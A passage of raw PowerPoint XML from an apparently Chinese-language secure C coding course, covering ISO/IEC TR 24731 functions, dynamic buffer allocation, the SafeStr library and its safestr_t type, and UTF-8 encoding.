                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>如果目标缓冲区的最大长度是不被正确指定，函数仍能发生缓冲区溢出。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>The ISO/IEC TR 24731 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>完全安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>标准化但可能仍在发展</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>在下面方面有用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>预防性维护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>遗留系统现代化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27542139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7200" y="304800"/>
            <a:ext cx="7543800" cy="1295400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>动态方法</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>动态地分配缓冲区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1981200"/>
            <a:ext cx="8140700" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>动态分配的缓冲区需要动态调整额外的内存。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>动态方法更好，而且不丢弃多余的数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>主要缺点是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>如果输入被限制，则可能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>耗尽机器内存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>结果导致拒绝服务攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5997786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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>防范策略</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SafeStr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1676400"/>
            <a:ext cx="8140700" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Matt Messier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>John Viega</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>编写</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>提供丰富的字符串操作库，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>拥有安全的语义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>与遗留的库代码互操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>使用一种动态分配的方式，可以在需要时自动调整字符串的大小。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SafeStr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>通过在需要精加字符串大小的操作中，重新分配内存并移动字符串内容来实现这一点。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>因此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>在使用这个库的时候，不会发生缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="250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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16415830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zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>safestr_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="1905000"/>
            <a:ext cx="8140700" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SafeStr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>库基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>safestr_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>safestr_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>类型与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>*是兼容的，并且可以将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>safestr_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>转型为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>*当作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>风格字符使用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>safestr_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>类型保存了由该指针所引用的内存部分的说明信息（例如，实际长度和分配的长度），保存子指针所指向的内存之前</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1263950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585A8-BC1E-4146-B93F-8F5194AF8AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UTF-8</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E730B18-5AED-458A-8D1F-A900B07DD494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{995E8DC3-6773-B14F-B697-ECFEC989770F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F589BCED-C3A8-40B7-95D4-867AC07E9017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675481" y="2440484"/>
            <a:ext cx="7793037" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>UTF-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>是一种变长字节编码方式。对于某一个字符的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>UTF-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>编码，如果只有一个字节则其最高二进制位为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>；如果是多字节，其第一个字节从最高位开始，连续的二进制位值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
